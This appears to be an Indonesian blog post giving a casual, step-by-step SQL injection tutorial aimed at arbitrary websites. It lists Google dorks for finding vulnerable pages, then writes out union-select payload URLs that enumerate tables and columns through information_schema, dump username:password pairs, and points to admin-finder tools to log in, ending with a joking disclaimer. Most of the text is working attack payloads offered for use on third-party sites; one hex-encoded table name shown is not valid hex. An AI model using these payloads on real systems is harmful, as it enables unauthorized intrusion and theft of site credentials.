Pertama-tama, weh-weh terlalu formal neh. Coretan2 dibawah ini buatan seorang yang bodoh jadi kalau ada salahnya mohon maap ya tmen2. Mungkin diantara kita ada yang bertanya? apakah yang dimaksud SQLi. Wah kalo gitu pertanyaannya silahkan googling pliss, SQLi (aka Sql Injection Structured Query Language Injection) adalah salah satu cara termudah untuk mengeksploitasi / hacking situs. Cara ini tergolong mudah tapi hasilnya bukan main-main, apalagi buat orang bodoh kayak saya wakkakakakka..Akan tetapi kebanyakan tutorial SQLi sangat buruk (bukan maksud mengejek), So itulah alasan mengapa aku menulis coretan ini. SQLi memang teknik dasar memasukkan query ke database untuk memperoleh admin dan passwordnya...
Step 1: Mencari Situs yang vulnerability SQLiMencari situs yang bisa terinfeksi virus sqli itu sangat mudah tinggal kita googling aj, dan masukin salah satu dork berikut:
inurl:news_view.php?id=
inurl:sql.php?id=
shredder-categories.php?id=
buy.php?category=
t-shirt/product.php?id=
sebenarnya masih banyak sekali model-model dork tetapi sayang, aku males nulisnya hehehehe
setelah masukin dork tadi, langsung pelototin situs2 yang nongol dilayar monitor, seperti:
http://www.malingshitanjing.com/index.php?id=3
untuk ngecek situs tersebut vulnerability sqli, hal yang harus dilakukan adalah ketik " pada akhir url. jadi sekarang urlnya jadi seperti ini:
http://www.malingshitanjing.com/index.php?id=3"
tekan enter dan kamu akan akan menemukan error
warning:you have error sql kampret kayak yang baca hehehe, check the manual qorresponden mysql bla bla....
bila itu terjadi berarti situs itu bisa injeksi
udah basa-basinya langsung aja ya bro
kita masukin querry lagi pada url
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1--
bila page yang tampil masih error atau normal( mungkin dihidden oleh admin), jangan putus asa terus masukin querrynya
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2--
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,3--
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,4--
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,5--
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,2,3,4,5,6--
sebut saja kita sudah dapat page yang berisi nomor 2
lalu kita masukan querry ini
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,table_name,3,4,5,6+from+
information_schema.tables+where+table_schema=database()+limit+0,1--
kemudian akan muncul page beserta isi dari "table"nya seperti id, name, password tapi muncul satu persatu. buruknya kita harus mencari satu-satu dengan menambahkan querry
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,table_name,3,4,5,6+from+
information_schema.tables+where+table_schema=database()+limit+1,1--
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,table_name,3,4,5,6+from+
information_schema.tables+where+table_schema=database()+limit+2,1--
mungkin ada yang mengira url2 diatas tak dirubah tapi cobalah melirik ke akhir url, disitu "0,1" diganti dengan "1,1" terus "2,1" dst sampai kita dapat informasi sesuai keinginan kita. Tapi yang paling penting kita harus dapatkan tabel dengan nama seperti: tbl_user / tbl_admin / user / admin atau apalah yang mirip kata-kata tersebut. Anggap saja kita sudah dapat "tbl_user". Selanjutnya kita ubah "tbl_user" menjadi apa ya....????? pokoknya kita masuk ke piclist.com/techref/ascii lalu kita masukan "tbl_user" lalu kita konvert ke HEX string. lalu kode pada HEX kita copy dan pastekan pada url setelah kata table_name=0x
http://www.malingshitanjing.com/index.php?id=-3+union+all+select+1,column_name,3,4,5,6+from+
information_schema.columns+where+table_name=0xM4l1N9SH1T4NJ1NG+limit+0,1--
jangan lupa tekan enter, lalu akan muncul page yang merupakan isi dari kolom tersebut
BERSAMBUNG, malas ngetiknya ngantuk.......klo ada yang komentar nanti saya lanjutin...ok
Setelah kita tekan enter url tersebut. Maka, yang akan kita cari selanjutnya adalah informasi name dan password. Perlu diingat setiap situs memiliki istilah berbeda-beda, ada yang username, atau login, atau user, atau admin_login dan pass, atau password pokoknya yang mirip-mirip dengan istilah diatas itulah yang kita cari. Anggap saja kita sudah dapatkan username dan password, lalu kita ubah urlnya menjadi seperti berikut:http://malingshitanjing.com/index.php?id=-3=union+all+select+1,
concat(username,char(58),password),3,4,5,6+from+tbl_user--
maka halaman yang akan keluar berisi username:password, anggap saja kita sudah berhasil mendapatkan informasinya, kalau kita punya ingatan yang buruk alangkah baiknya kalau kita mencatat informasi-informasi penting dalam notepad.
Mencari Page Admin
Inilah hal terakhir yang harus kita lakukan dalam SQLi, mencari halaman login admin situs target kita. Karena percuma kita mengetahui username dan passwordnya bila tak bisa mencari halaman adminnya. Ada banyak cara untuk mencari page adminnya, disini kita memakai tool intellitampeler (tool bisa didownload disini) atau admin finder online yang sekarangpun sudah ada. Nah, kalau kita sudah berhasil menemukan halaman adminnya, masukkan username dan password yang sudah kita dapatkan tadi lalu login. Hahahhaha kita sudah berhasil masuk… selanjutnya terserah anda bro…
Nb: Segala sesuatu yang terjadi akibat tutorial ini bukanlah tanggung jawab penulis, tanggung sendiri jangan bawa-bawa saya. Disini saya Cuma berbagi ilmu yang juga masih dangkal biar bermanfaat untuk kebaikan…emang benar buat kebaikan wehehehehe
Langganan:
Postingan (Atom)